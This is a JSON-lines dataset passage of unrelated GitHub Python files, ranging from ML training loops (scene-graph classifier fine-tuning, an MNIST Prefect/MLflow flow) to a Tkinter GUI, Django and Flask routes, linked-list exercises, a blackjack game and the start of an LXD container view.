# # # # # # # # # # # # # # #\n if cfg.MODEL.ft_with_dist0:\n logit_wt = sgg_model.roi_heads.relation.predictor.logit_wt\n\n data_set = HTCL_Feats_Dataset(cfg, logger)\n train_data_loader = make_classifier_data_loader(cfg, dataset=data_set, batch_size=num_batch,\n shuffle=True, start_iter=arguments[\"iteration\"], is_distributed=distributed)\n val_data_loaders = make_data_loader(cfg, mode='val', is_distributed=distributed,)\n debug_print(logger, 'end dataloader')\n\n if cfg.SOLVER.PRE_VAL:\n logger.info(\"Validate before training\")\n run_val(cfg, sgg_model, val_data_loaders, distributed, logger)\n\n logger.info(\"Start training\")\n ce_loss = nn.CrossEntropyLoss()\n meters = MetricLogger(delimiter=\" \")\n max_iter = len(train_data_loader)\n start_iter = arguments[\"iteration\"]\n\n start_training_time = time.time()\n end = time.time()\n print_first_grad = True\n\n for iteration, batch in enumerate(train_data_loader, start_iter):\n data_time = time.time() - end\n iteration = iteration + 1\n arguments[\"iteration\"] = iteration\n classifier.train()\n\n if cfg.MODEL.ft_with_dist0:\n feats, rels, rel_dist0 = batch\n rel_dist0 = rel_dist0.to(device)\n feats = feats.to(device)\n rels = rels.to(device)\n rel_dist = classifier(feats, rel_dist0, logit_wt)\n else:\n feats, rels = batch\n feats = feats.to(device)\n rels = rels.to(device)\n rel_dist = classifier(feats)\n loss_ce = ce_loss(rel_dist.float(), rels.long())\n loss_relation = dict(loss_ce=loss_ce)\n\n losses = sum(loss for loss in loss_relation.values())\n # reduce losses over all GPUs for logging purposes\n loss_dict_reduced = reduce_loss_dict(loss_relation)\n losses_reduced = sum(loss for loss in loss_dict_reduced.values())\n\n meters.update(loss=losses_reduced, **loss_dict_reduced)\n cls_optimizer.zero_grad()\n\n # Note: If mixed precision is not used, this ends up doing nothing\n # Otherwise apply loss scaling for mixed-precision recipe\n # with amp.scale_loss(losses, cls_optimizer) as scaled_losses:\n # scaled_losses.backward()\n\n losses.backward()\n # add clip_grad_norm from MOTIFS, tracking gradient, used for debug\n verbose = (iteration % cfg.SOLVER.Classifier_checkpoint_period) == 0 \\\n or print_first_grad # print grad or not\n print_first_grad = False\n clip_grad_norm([(n, p) for n, p in classifier.named_parameters() if p.requires_grad],\n max_norm=cfg.SOLVER.GRAD_NORM_CLIP, logger=logger, verbose=verbose, clip=True)\n cls_optimizer.step()\n scheduler.step()\n\n batch_time = time.time() - end\n end = time.time()\n meters.update(time=batch_time, data=data_time)\n\n eta_seconds = meters.time.global_avg * (max_iter - iteration)\n eta_string = str(datetime.timedelta(seconds=int(eta_seconds)))\n\n if iteration % (cfg.SOLVER.Classifier_checkpoint_period/10) == 0:\n logger.info(meters.delimiter.join(\n [\n \"eta: {eta}\",\n \"iter: {iter}\",\n \"{meters}\",\n \"lr: {lr:.6f}\",\n \"max_iter: {max_iter}\",\n ]\n ).format(\n eta=eta_string,\n iter=iteration,\n meters=str(meters),\n lr=cls_optimizer.param_groups[-1][\"lr\"],\n max_iter=max_iter,\n ))\n\n if iteration % cfg.SOLVER.Classifier_checkpoint_period == 0:\n logger.info(\"Start validating\")\n sgg_model = sgg_model_load_parameterss(sgg_model, classifier, distributed)\n val_result = run_val(cfg, sgg_model, val_data_loaders, distributed, logger)\n arguments[\"last_val_results\"] = val_result\n if arguments[\"last_val_results\"] >= arguments[\"best_val_results\"]:\n arguments[\"best_val_results\"] = arguments[\"last_val_results\"]\n\n logger.info(\"Validation Result: %.4f\" % val_result)\n checkpointer.save(\"model_{:07d}\".format(iteration), **arguments)\n\n total_training_time = time.time() - start_training_time\n total_time_str = str(datetime.timedelta(seconds=total_training_time))\n logger.info(\n \"Total training time: {} ({:.4f} s / it)\".format(\n total_time_str, total_training_time / (max_iter)\n )\n )\n\n with open(output_dir + \"/End_traning\", 'w') as f:\n f.write('End classifier training')\n\n if not cfg.TEST.Skip_test:\n checkpointer.load()\n sgg_model = sgg_model_load_parameterss(sgg_model, classifier, distributed)\n run_test(cfg, sgg_model, distributed, logger)\n\n return classifier, sgg_model","repo_name":"wanglei0618/HTCL","sub_path":"maskrcnn_benchmark/HTCL/htcl_classifier_ft.py","file_name":"htcl_classifier_ft.py","file_ext":"py","file_size_in_byte":14224,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"3110254099","text":"import gui.shared_functions.functions as gsf\nimport gui.multivariate_analysis.main_page as gmm\nfrom tkinter import Frame, Button\n\nclass MainPage:\n def __init__(self, master):\n self.dict = {\n 'button_height': 0.05,\n 'start_point': 0,\n 'one_portion': 0.1,\n 'two_portions': 0.2,\n 'three_portions': 0.3,\n 'four_portions': 0.4,\n 'five_portions': 0.5,\n 'six_portions': 0.6,\n 'seven_portions': 0.7,\n 'eight_portions': 0.8,\n 'nine_portions': 0.9,\n 'ten_portions': 1,\n }\n # keep `root` in `self.master`\n self.master = master\n self.frame = Frame(self.master, bg='white')\n self.frame.place(relx=self.dict['one_portion'], rely=self.dict['start_point'], relwidth=self.dict['eight_portions'], relheight=self.dict['ten_portions'])\n self.button1 = Button(self.frame, text=\"A. Single Factor Analysis\" # (*)\n # , command = helloCallBack\n )\n self.button2 = Button(self.frame, text=\"B. Multivariate Analysis\", command=self.openMultivariateAnalysisPage)\n self.button1.place(relx=self.dict['start_point'], rely=self.dict['two_portions'], relwidth=self.dict['ten_portions'], relheight=self.dict['two_portions'])\n self.button2.place(relx=self.dict['start_point'], rely=self.dict['six_portions'], relwidth=self.dict['ten_portions'], relheight=self.dict['two_portions'])\n\n def openMultivariateAnalysisPage(self):\n gsf.deleteWidgets(self.frame)\n # use `root` with another class\n return gmm.MultivariateAnalysisPage(self.master, self.frame, self.dict)\n\n","repo_name":"minhdc2/Credit_Modelling---Desktop-App","sub_path":"gui/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19341455678","text":"def mergeTwoSortedLists(self, head_1, head_2):\n # if head_1 is None and head_2 is None: return None\n dummy_head = Node(None)\n tail, current_1, current_2 = dummy_head, head_1, head_2\n while current_1 is not None and current_2 is not None:\n if current_1.val <= current_2.val:\n tail.next, current_1 = current_1, current_1.next\n else:\n tail.next, current_2 = current_2, current_2.next\n\n tail = tail.next\n\n # work with leftover list\n if current_1 is None:\n tail.next = current_2\n if current_2 is None:\n tail.next = current_1\n\n return dummy_head.next\n\n\"\"\"\nlist1 = 1 -> 3 -> None, list2 = 2 -> 4 -> None\ndummy_head = None -> 1 -> 2 -> 3\ntail.next = 3\ncurrent_1 = None\n- saved_next = None\ncurrent_2 = 2\n\n\"\"\"\n\n\ndef mergeTwoSortedLists(self, head_1, head_2):\n if head_1 is None and head_2 is None:\n return None\n\n if head_1 is None:\n return head_2\n\n if head_2 is None:\n return head_1\n\n if head_1.val <= head_2.val:\n saved_next = head_1.next\n head_1.next = self.mergeTwoSortedLists(saved_next, head_2)\n return head_1\n else:\n saved_next = head_2.next\n head_2.next = self.mergeTwoSortedLists(head_1, saved_next)\n return head_2","repo_name":"quyencodes/structy-py","sub_path":"9-dailies/1-linked_lists/mergeTwoSortedLists.py","file_name":"mergeTwoSortedLists.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39590417230","text":"from prefect import flow, task\nfrom prefect.task_runners import SequentialTaskRunner\nimport argparse\nimport tensorflow as tf\nfrom tensorflow import keras\nimport mlflow\nimport mlflow.keras\nimport os\n\nos.environ['AZURE_STORAGE_ACCESS_KEY'] =\"XXXXXXXXXXXXXXX\"\n\n@task(name=\"MNIST Task Prefect-AKS-MLFlow\")\ndef task_train_mnist():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--epochs', type=int, default=10, help='Number of epochs to train for')\n parser.add_argument('--batch_size', type=int, default=128, help='Batch size for training')\n parser.add_argument('--learning_rate', type=float, default=0.001, help='Learning rate for optimizer')\n parser.add_argument('--dropout_rate', type=float, default=0.25, help='Dropout rate for regularization')\n args = parser.parse_args()\n\n # Load MNIST dataset\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n x_train = x_train.astype('float32') / 255.0\n x_test = x_test.astype('float32') / 255.0\n y_train = keras.utils.to_categorical(y_train)\n y_test = keras.utils.to_categorical(y_test)\n\n # Define model architecture\n model = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28)),\n keras.layers.Dense(128, activation='relu'),\n keras.layers.Dropout(args.dropout_rate),\n keras.layers.Dense(10, activation='softmax')\n ])\n model.compile(optimizer=tf.optimizers.Adam(lr=args.learning_rate),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n # Set MLFlow tracking server URL\n model_name=\"MNIST-Model\"\n mlflow.set_tracking_uri(\"http://mlflowserver-aci-latest-dnsname.eastus.azurecontainer.io:5000\")\n mlflow.set_experiment(\"MNIST-Prefect-AKS-MLFlow-ADLS\")\n\n # Start MLFlow tracking\n with mlflow.start_run() as run:\n # Log parameters\n mlflow.log_param('epochs', args.epochs)\n mlflow.log_param('batch_size', args.batch_size)\n mlflow.log_param('learning_rate', args.learning_rate)\n mlflow.log_param('dropout_rate', args.dropout_rate)\n\n mlflow.keras.log_model(model,model_name)\n mlflow.end_run()\n\n@flow(name=\"MNIST Traning Flow Prefect-AKS-MLFlow\"\n #,description=\"MNIST Flow using SequentialTaskRunner\"\n #,task_runner=SequentialTaskRunner()\n ,log_prints=True)\ndef train_mnist():\n print(\"Beginning Traning for MNIST! Traning on AKS Tracking MLFlow Workflow Prefect\")\n task_train_mnist()\n\n\nif __name__ == \"__main__\":\n train_mnist()","repo_name":"keshavksingh/ml-training-prefect-workflow","sub_path":"Train-MLFlow-Prefect.py","file_name":"Train-MLFlow-Prefect.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19416813519","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('',views.index,name=\"index\"),\n path('about/',views.about,name=\"about\"),\n path('services/',views.services,name=\"services\"),\n path('Product/',views.Product,name=\"Product\"),\n path('register/', views.register,name=\"register\"),\n path('userlogin/',views.userlogin,name=\"userlogin\"),\n path('login1/', views.login1, name='login1'),\n path('logout1/', views.logout1, name=\"logout1\"),\n path('UserTable/', views.UserTable, name=\"UserTable\"),\n path('delete//', views.delete_data, name=\"deletedata\"),\n path('update//', views.Update_data,name=\"updatedata\"),\n path('adduser/', views.adduser, name=\"adduser\"),\n path('EditProfile//', views.EditProfile, name=\"EditProfile\"),\n path('forgot/',views.forgot,name='forgot'),\n path('UserStatus//',views.UserStatus,name=\"UserStatus\"),\n # path('countries',views.countries,name=\"register\"),\n path('stateFetch/', views.stateFetch),\n path('cityFetch/', views.cityFetch),\n path('ContentTable/',views.ContentTable,name=\"ContentTable\"),\n path('UpdatePost/',views.UpdatePost,name=\"UpdatePost\"),\n path('delete/',views.delete_post,name=\"deletepost\"),\n path('PostStatus/',views.PostStatus,name=\"PostStatus\"),\n]\n\n","repo_name":"Anushit/Adiyogi","sub_path":"frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30013621976","text":"import sys\n\ndef cal_width(address):\n width = 0\n for i in address:\n i = int(i)\n if i == 0:\n width += 4\n elif i == 1:\n width += 2\n else:\n width += 3\n return width +len(address) + 1\n\n\ncases = []\nwhile True:\n input_str = input()\n if input_str == '0':\n break\n cases.append(cal_width(input_str))\n\nfor i in cases:\n print(i)","repo_name":"kangtae210/leetCode","sub_path":"B_1284.py","file_name":"B_1284.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36366882808","text":"from localground.apps.site.tests import ModelMixin\nfrom django import test\nfrom localground.apps.site import models\n\n\nclass BaseAbstractModelClassTest(ModelMixin):\n # To run test:\n # $ python manage.py test localground.apps.site.tests.models.PhotoModelTest\n\n def test_classes_all_have_required_class_properties(self, **kwargs):\n c = self.model.__class__\n self.assertTrue(hasattr(c, 'object_type'))\n self.assertTrue(hasattr(c, 'model_name'))\n self.assertTrue(hasattr(c, 'pretty_name'))\n self.assertTrue(hasattr(c, 'model_name_plural'))\n self.assertTrue(hasattr(c, 'pretty_name_plural'))\n\n '''\n ----------------------------------------------------------------------------\n CLASS PROPERTIES\n Pick a class that inherits from Base and ensure that all of methods work.\n ----------------------------------------------------------------------------\n '''\n def test_object_type_prop(self):\n # Check that it works for a class and a method\n self.assertEqual(self.model.__class__.object_type, self.object_type)\n self.assertEqual(self.model.object_type, self.object_type)\n\n def test_model_name_prop(self):\n # Check that it works for a class and a method\n self.assertEqual(self.model.__class__.model_name, self.model_name)\n self.assertEqual(self.model.model_name, self.model_name)\n\n\n def test_model_name_plural_prop(self):\n # Check that it works for a class and a method\n self.assertEqual(self.model.__class__.model_name_plural, self.model_name_plural)\n self.assertEqual(self.model.model_name_plural, self.model_name_plural)\n\n def test_pretty_name_prop(self):\n # Check that it works for a class and a method\n self.assertEqual(self.model.__class__.pretty_name, self.pretty_name)\n self.assertEqual(self.model.pretty_name, self.pretty_name)\n\n def test_pretty_name_plural_prop(self):\n # Check that it works for a class and a method\n self.assertEqual(self.model.__class__.pretty_name_plural, self.pretty_name_plural)\n self.assertEqual(self.model.pretty_name_plural, self.pretty_name_plural)\n\n '''\n ----------------------------------------------------------------------------\n CLASS PROPERTIES\n Pick a class that inherits from Base and ensure that all of methods work.\n ----------------------------------------------------------------------------\n '''\n def test_has_required_class_methods(self, **kwargs):\n c = self.model.__class__\n import inspect\n self.assertEqual(\n inspect.getargspec(c.get_model)[0],\n ['cls', 'model_name', 'model_name_plural']\n )\n self.assertTrue(hasattr(c, 'get_filter_fields'))\n self.assertTrue(hasattr(c, 'get_content_type'))\n\n def test_get_model_method_returns_model_unless_args_missing(\n self, **kwargs):\n from localground.apps.site import models\n self.assertEqual(models.Base.get_model(\n model_name=self.model_name), self.model.__class__\n )\n self.assertEqual(models.Base.get_model(\n model_name_plural=self.model_name_plural), self.model.__class__\n )\n\n # Ensure no arguments yields an error message:\n with self.assertRaises(Exception) as e:\n models.Base.get_model()\n self.assertEqual(\n e.exception.message,\n \"either model_name or model_name_plural argument is required\"\n )\n\n def test_get_filter_fields_returns_correct_tuple(self, **kwargs):\n from localground.apps.site import models\n self.assertEqual(models.Base.get_filter_fields(), {})\n self.assertEqual(len(models.Photo.get_filter_fields()), 11)\n self.assertEqual(\n self.model.__class__.get_filter_fields().keys(),\n self.model.get_filter_fields().keys(),\n [\n 'attribution',\n 'name',\n 'file_name_orig',\n 'tags',\n 'point',\n 'owner',\n 'project',\n 'caption',\n 'device',\n 'date_created',\n 'id'\n ])\n\n def test_get_content_type_returns_correct_type(self, **kwargs):\n from localground.apps.site import models\n from django.contrib.contenttypes.models import ContentType\n self.assertEqual(models.Base.get_content_type().name, \"base\")\n self.assertEqual(\n self.model.__class__.get_content_type().name,\n self.model.get_content_type().name,\n self.model_name\n )\n","repo_name":"LocalGround/localground","sub_path":"apps/site/tests/models/abstract_base_tests.py","file_name":"abstract_base_tests.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"} +{"seq_id":"23474952720","text":"from random import *\n\nglobal p_chips\nglobal bet\n# global p_total\n# global d_total\n# global p_card_1\n# global p_card_2\n# global d_card_1\n# global d_card_2\n# global p_value_1\n# global p_value_2\n# global d_value_2\n# global d_value_2\n\np_chips = 1000\nbet = 25\n# p_total = 0\n# d_total = 0\n# p_card_1 = 0\n# p_card_2 = 0\n# d_card_1 = 0\n# d_card_2 = 0\n# p_value_1 = 0\n# p_value_2 = 0\n# d_value_2 = 0\n# d_value_2 = 0\n\ndef play_again_request():\n request = input('Would you like to play again? [y/n]: ')\n while request.lower().replace(' ', '') != 'y' or request.lower().replace(' ', '') != 'n':\n continue\n if request.lower().replace(' ', '') == 'y':\n blackjjack_game()\n elif request.lower().replace(' ', '') == 'n':\n quit()\n\ndef deck():\n deck = []\n values = ['2','3','4','5','6','7','8','9','10','J','Q','K', 'A']\n types = ['Clubs','Diamonds','Hearts','Spades']\n for type in types:\n for value in values:\n deck.append(value + ' of ' + type)\n return deck\ngame_deck = deck()\n\ndef new_card(deck):\n return deck[randint(0,len(deck)-1)]\n\ndef remove_card(deck, card):\n return deck.remove(card)\n\ndef card_value(card):\n if card[:1] in ('23456789'):\n return int(card[:1])\n elif card[:1] in ('1JQK'):\n return 10\n elif card[:1] == 'A':\n # need to make it not callable when it is dealer's card, so that dealer choose automatically\n print(f'One of your cards is {card}.')\n num = input('Do you want this to be 1 or 11 points? [1/11]: ')\n while num != '1' or num != '11':\n if num == '1':\n print(f'{card} will be equal to 1 now.\\n')\n return int(1)\n elif num == '11':\n print(f'{card} will be equal to 11 now.\\n')\n return int(11)\n else:\n num = input('1 or 11? ')\n\ndef p_hand_creation():\n# Player's Hand creation:\n p_card_1 = new_card(game_deck)\n remove_card(game_deck, p_card_1)\n p_card_2 = new_card(game_deck)\n remove_card(game_deck, p_card_2)\n print (f'\\nYou\\'ve got {p_card_1} and {p_card_2}.')\n p_value_1 = card_value(p_card_1)\n p_value_2 = card_value(p_card_2)\n p_total = p_value_1 + p_value_2\n print(f'Total is: {p_total}\\n')\n return p_card_1, p_card_2, p_value_1, p_value_2, p_total\n\ndef d_hand_creation():\n# Dealer's Hand creation:\n d_card_1 = new_card(game_deck)\n remove_card(game_deck, d_card_1)\n d_card_2 = new_card(game_deck)\n remove_card(game_deck, d_card_2)\n print('Dealer draws two cards - one of them face up and one is a hole card (face down).')\n print(f'First card is {d_card_1}.\\n')\n d_value_1 = card_value(d_card_1)\n d_value_2 = card_value(d_card_2)\n d_total = d_value_1 + d_value_2\n return d_card_1, d_card_2, d_value_1, d_value_2, d_total\n\ndef p_hit():\n p_card_extra = new_card(game_deck)\n remove_card(game_deck, p_card_extra)\n p_value_extra = card_value(p_card_extra)\n p_total += p_value_extra\n print(f'You\\'ve got {p_card_extra}, and your current Total is {p_total}.')\n game_condition_check()\n return p_total\n\ndef p_stand():\n print(f'\\nThe dealer discloses his hole card. It is {d_card_2}.')\n print(f'So he has {d_card_1} and {d_card_2} with a Total of {d_total}.\\n')\n while d_total < 17:\n print('The Dealer hits again.')\n d_card_extra = new_card(game_deck)\n d_value_extra = card_value(d_card_extra)\n d_total += d_value_extra\n print(f'The card is {d_card_extra} and new Total is {d_total}\\n')\n game_condition_check()\n\ndef game_condition_p_blackjack():\n print('Blackjack! You won! You gain 1.5 * Your Bet.')\n p_chips += (bet * 1.5)\n p_chips = round(p_chips)\n print(f'You currently have {p_chips} chips.')\n play_again_request()\n\ndef game_condition_d_blackjack():\n p_chips -= bet\n print(f'Dealer has Blackjack! You have lost your Bet of {bet}')\n print(f'Your account is {p_chips} chips now.')\n play_again_request()\n\ndef game_condition_push():\n print('It\\'s a Push! (draw) ')\n print(f'You still have {p_chips} chips.')\n play_again_request()\n\ndef game_condition_loss():\n p_chips -= bet\n print(f'You have {p_total} points. You have lost your Bet of {bet}')\n print(f'Your account is {p_chips} chips now.')\n play_again_request()\n\ndef game_condition_check():\n if p_total == 21 and d_total != 21:\n game_condition_p_blackjack()\n if p_total != 21 and d_total == 21:\n game_condition_d_blackjack()\n if p_total == 21 and d_total == 21:\n game_condition_push()\n if p_total > 21:\n game_condition_loss()\n\ndef game_body():\n while True:\n p_card_1, p_card_2, p_value_1, p_value_2, p_total = p_hand_creation()\n d_card_1, d_card_2, d_value_1, d_value_2, d_total = d_hand_creation()\n decision = input('Would you like to Hit or Stand? [h/s]: ')\n if decision.lower().replace(' ', '') == 'h':\n p_hit()\n game_condition_check()\n if decision.lower().replace(' ', '') == 's':\n p_stand()\n game_condition_check()\n\ngame_body()","repo_name":"RealHomoBulla/Beetroot_Academy_Homeworks","sub_path":"BlackJack/MyBlackJack_Ver_1.py","file_name":"MyBlackJack_Ver_1.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29188636640","text":"from Header import Header\n\nclass ROM(object):\n def __init__(self, rom_path: str):\n with open(rom_path, \"rb\") as file:\n self.rom = file.read()\n self.header = Header(self.rom[0:15])\n self.trainer_data = []\n if self.header.trainer:\n self.trainer_data = self.rom[16: 16 + 512]\n self.prg_data = self.rom[16 + 512: 16 + 512 + self.header.prg_data_size]\n else:\n self.prg_data = self.rom[16: 16 + self.header.prg_data_size]\n \n","repo_name":"ch3rag/NESPY","sub_path":"ROM.py","file_name":"ROM.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19897484148","text":"__all__ = [\n \"dictify\",\n \"UNICODE\",\n \"BINARY\"\n]\n\nfrom collections import OrderedDict\nfrom typing import Any, Dict, Union\n\n\ndef dictify(od: Union[OrderedDict, Any]) -> Dict[Any, Any]:\n \"\"\"Recursively replace OrderedDict with dict\"\"\"\n if isinstance(od, OrderedDict):\n return dict((k, dictify(v)) for k, v in od.items())\n else:\n return od\n\n\ndef BINARY(s: Union[str, bytes]) -> bytes:\n if isinstance(s, str):\n return s.encode(\"utf-8\")\n elif isinstance(s, bytes):\n return s\n else:\n raise TypeError(\"%s cannot be converted to binary\" % type(s))\n\n\ndef UNICODE(s: Union[str, bytes]) -> str:\n if isinstance(s, bytes):\n return s.decode(\"utf-8\")\n elif isinstance(s, str):\n return s\n else:\n return str(s)\n","repo_name":"skupperproject/skupper-router","sub_path":"python/skupper_router_internal/compat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"29808315715","text":"from flask import Blueprint, request\nfrom pymongo import MongoClient\nfrom bson.json_util import dumps\nimport jwt\nimport os\nimport bcrypt\nimport datetime\nfrom misc.stripeexpire import StripeExpireCheck\n\nuserSettings = Blueprint('userSettings', __name__) # router\n\n# security\ntoken_key = os.environ.get('TOKEN_KEY')\nmongo_url = os.environ.get('MONGODB_URI')\n\n# MongoDB\nclient = MongoClient(mongo_url or 'mongodb://localhost:27017/')\ndb = client.magicpill\ncollection = db.userSettings\n\n\n# get\n@userSettings.route(\"/user-settings\", methods=['POST'])\ndef get():\n token = request.get_json()['token']\n # language = request.get_json()['language']\n decoded = jwt.decode(token, token_key, algorithms='HS256')\n\n if decoded:\n results = collection.find({'userId': decoded['_id']})\n return dumps(results)\n else:\n return dumps(False)\n\n\n# new\n@userSettings.route(\"/new-user-settings\", methods=['POST'])\ndef new():\n token = request.get_json()['token']\n items = request.get_json()['items']\n decoded = jwt.decode(token, token_key, algorithms='HS256')\n\n if decoded:\n id = decoded['_id']\n stripe = StripeExpireCheck(id)\n\n if stripe > 0:\n collection.insert({\n \"_id\" : items['_id'],\n \"userId\" : id,\n \"dietType\" : items['dietType'],\n \"lbs\" : items['lbs'],\n \"macros\" : items['macros']\n })\n return dumps(True)\n\n elif stripe < 0:\n return dumps({'expired': True})\n\n return dumps(False)\n\n else:\n return dumps(False)\n\n\n# update\n@userSettings.route(\"/user-settings\", methods=['PUT'])\ndef update():\n token = request.get_json()['token']\n itemId = request.get_json()['itemId']\n items = request.get_json()['items']\n decoded = jwt.decode(token, token_key, algorithms='HS256')\n\n if decoded:\n id = decoded['_id']\n stripe = StripeExpireCheck(id)\n\n if stripe > 0:\n collection.update_one({'_id': itemId}, {'$set': items})\n return dumps(True)\n\n elif stripe < 0:\n return dumps({'expired': True})\n\n return dumps(False)\n\n else:\n return dumps(False)\n","repo_name":"tumeware/Calorie-Counter-Server","sub_path":"routes/userSettings.py","file_name":"userSettings.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70122502811","text":"\nimport os\nfrom tqdm import tqdm\nfrom loguru import logger\nfrom argparse import ArgumentParser\n\nfrom mmcls.apis import init_model\n\nfrom tools.custom_tools.utils import save_labelbee\nfrom tools.custom_tools.inference import \\\n inference_multi_label_model, inference_multi_task_model\n\n\nATTRIBUTES = ['types', 'colors']\nCLASSES = [\n ['bus', 'car', 'suv', 'truck', 'van'],\n ['black', 'blue', 'coffee', 'gray', 'green', 'red', 'orange', 'white', 'yellow']\n]\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('config', help='Config file')\n parser.add_argument('checkpoint', help='Checkpoint file')\n parser.add_argument('input', default=None, help='Image input path')\n parser.add_argument('--mode', default='debug', \n help='multilabel or multitask, or debug')\n parser.add_argument(\n '--device', default='cuda:0', help='Device used for inference')\n args = parser.parse_args()\n\n # build the model from a config file and a checkpoint file\n model = init_model(args.config, args.checkpoint, device=args.device)\n\n items = [os.path.join(args.input, p) for p in os.listdir(args.input)]\n\n # predict\n if args.mode == 'debug':\n for item in items:\n try:\n _ = inference_multi_label_model(model, item, CLASSES)\n except AttributeError:\n logger.debug(item)\n logger.info(\"Everything is ok! You can reset the DEBUG False.\")\n else:\n assert args.mode in ['multilabel', 'multitask', 'debug'], \\\n f\"Mode must be in multilabel or multitask, but got {args.mode}.\"\n for item in tqdm(items):\n if args.mode == 'multilabel':\n res = inference_multi_label_model(model, item, CLASSES, mode='tag')\n else:\n res = inference_multi_task_model(model, item, CLASSES, mode='tag')\n result = {ATTRIBUTES[i]: res['pred_class'][i] for i in range(len(ATTRIBUTES))}\n save_labelbee(item, result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"David-19940718/mmclassification","sub_path":"tools/custom_tools/tag_multilabel_and_multitask.py","file_name":"tag_multilabel_and_multitask.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"16465786498","text":"\n\nCOMMAND_MAP = {\n '>': (1, 0),\n '<': (-1, 0),\n '^': (0, 1),\n 'v': (0, -1)\n}\n\n\ndef part_1(data_str):\n pos_x, pos_y = 0, 0\n house_count = {(pos_x, pos_y): 1}\n for command in data_str:\n pos_x += COMMAND_MAP[command][0]\n pos_y += COMMAND_MAP[command][1]\n if (pos_x, pos_y) in house_count:\n house_count[(pos_x, pos_y)] += 1\n else:\n house_count[(pos_x, pos_y)] = 1\n return len(list(house_count.values()))\n\n\ndef part_2(data_str):\n pos_s_x, pos_s_y = 0, 0\n pos_r_x, pos_r_y = 0, 0\n santa_house_count = {(pos_s_x, pos_s_y): 1}\n robot_house_count = {(pos_r_x, pos_r_y): 1}\n\n for idx, command in enumerate(data_str):\n active = santa_house_count if idx % 2 == 0 else robot_house_count\n\n active_x, active_y = (pos_s_x, pos_s_y) if idx % 2 == 0 else (pos_r_x, pos_r_y)\n\n active_x += COMMAND_MAP[command][0]\n active_y += COMMAND_MAP[command][1]\n\n if (active_x, active_y) in active:\n active[(active_x, active_y)] += 1\n else:\n active[(active_x, active_y)] = 1\n if idx % 2 == 0:\n pos_s_x, pos_s_y = active_x, active_y\n else:\n pos_r_x, pos_r_y = active_x, active_y\n\n santa_house_count.update(robot_house_count) # combine the dict to remove overlaps\n return len(list(santa_house_count.values()))\n\n\nwith open('input.in') as f:\n data = f.read()\n print(\"Part 1: {}\".format(part_1(data)))\n print(\"Part 2: {}\".format(part_2(data)))\n","repo_name":"DawoudSheraz/advent-of-code-2015","sub_path":"Day 3/day_3.py","file_name":"day_3.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2827258023","text":"import cv2\nimport numpy as np\n\nframe = cv2.imread('kus.png',0)\n#Numpy ile kernel matris tanımı\nkernel = np.ones((25,25),np.uint8)\n\n#Açma\nsonuc = cv2.morphologyEx(frame, cv2.MORPH_OPEN, kernel)\ncv2.imshow(\"Sonuc\", sonuc)\n\ncv2.waitKey(0)","repo_name":"mesutpiskin/computer-vision-guide","sub_path":"code/morfolojik-goruntu-isleme/python/acinim-opening.py","file_name":"acinim-opening.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"tr","doc_type":"code","stars":359,"dataset":"github-code","pt":"32"} +{"seq_id":"15178893279","text":"import json\nimport pkgutil\nimport subprocess\nimport simplejson\n# Stacktrace stuff\nimport traceback\n\nimport colorama\nimport urllib3\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import redirect\nfrom django.template import loader\nfrom django.views.decorators.csrf import csrf_exempt\nfrom pylxd import Client\nfrom django.core import serializers\nfrom datetime import *\n\nfrom .models import Container, Pool, Image\nfrom containers_site.COPA_general import *\n\n# Disable SSL warnings on terminal\nurllib3.disable_warnings()\n\n# Enable colorama module for Stacktrace\ncolorama.init()\n\n\ndef load_modules_from_dir(dirname):\n for importer, package_name, _ in pkgutil.iter_modules([dirname]):\n full_package_name = \"%s.%s\" % (dirname, package_name)\n mdl = importer.find_module(package_name).load_module(full_package_name)\n return mdl\n\n\ndef alert_type(content):\n a_type = {\"success\": \"alert-success\",\n \"error\": \"alert-danger\",\n \"info\": \"alert-info\",\n \"warning\": \"alert-warning\"}\n return a_type[content]\n\n\ndef index(request):\n return redirect(\"welcome\")\n\n\ndef welcome(request):\n template = loader.get_template(\"core/welcome.html\")\n return HttpResponse(template.render({}, request))\n\n\ndef containers_list(request, message=\"\", alert=\"\"):\n containers = dict()\n template = loader.get_template(\"core/containers_list.html\")\n servers = get_server_list()\n for server in servers:\n pk_server = 